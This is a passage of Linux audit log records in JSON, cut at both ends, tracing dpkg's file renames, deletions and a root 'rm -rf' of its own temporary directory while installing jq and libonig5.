"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/md5sums",
"inode": 276992,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libonig5:amd64.md5sums",
"inode": 276992,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:517",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277011,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0002",
"inode": 277011,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:518",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/",
"inode": 2,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:519",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/",
"inode": 786435,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:520",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/",
"inode": 786440,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:521",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:522",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/",
"inode": 786435,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:523",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/",
"inode": 786447,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:524",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:525",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:526",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:527",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1b6"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.825:528",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba29b7e0",
"0x556eba29b810",
"0x556eba29b82a",
"0x556eb8dc8797"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/updates/",
"inode": 267115,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/updates/tmp.i",
"inode": 277162,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/updates/0003",
"inode": 277162,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.829:529",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-39",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x1"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.829:530",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7633,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae4660",
"0x7ffef7ae4720",
"0x556eba29b570",
"0x7ffef7ae4770"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/rm",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:531",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7633,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae4660",
"0x7ffef7ae4720",
"0x556eba29b570",
"0x7ffef7ae4770"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"rm",
"-rf",
"--",
"/var/lib/dpkg/tmp.ci"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/rm",
"inode": 787363,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:532",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 263,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7633,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "delete",
"ARGV": [
"0x4",
"0x564eec247938",
"0x0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "control",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:533",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 263,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7633,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "rm",
"exe": "/usr/bin/rm",
"key": "delete",
"ARGV": [
"0xffffff9c",
"0x564eec2464d0",
"0x200",
"0x1"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.829:534",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bc70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
